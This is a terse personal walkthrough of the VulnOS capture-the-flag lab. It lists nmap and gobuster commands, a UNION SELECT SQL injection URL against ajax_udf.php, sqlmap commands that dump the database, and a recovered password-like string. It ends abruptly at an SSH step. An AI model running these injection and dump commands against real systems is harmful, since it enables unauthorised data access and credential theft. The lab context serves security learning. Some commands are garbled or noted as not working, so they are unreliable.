VulnOS Walkthrough

Scanning Network:

nmap -p- 192.168.1.7 -oA vulos

Directory busting:

gobuster dir -u http://192.168.1.7 -w /usr/share/wordlists/dirb/common.txt -x html,bat,php,txt

phase2:direcctory gobuster dir -u http://192.168.1.7/jabc -w /usr/share/wordlists/dirb/common.txt -x html,bat,php,txt

Reference:

http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v%20ersion(),3,4,5,6,7,8,9

also mention /jabcdocs

Sqlmap:::

sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -dbs -dbms=mysql

Reference:::-dbs

sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -dbms=mysql

not working like above….

— — — — — — — — — — — — — — — — — — — — — —

sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs — dump

webmin1980

Ssh connection::

Kali machine:(without connecting ssh connection terminal)

Now ssh terminal: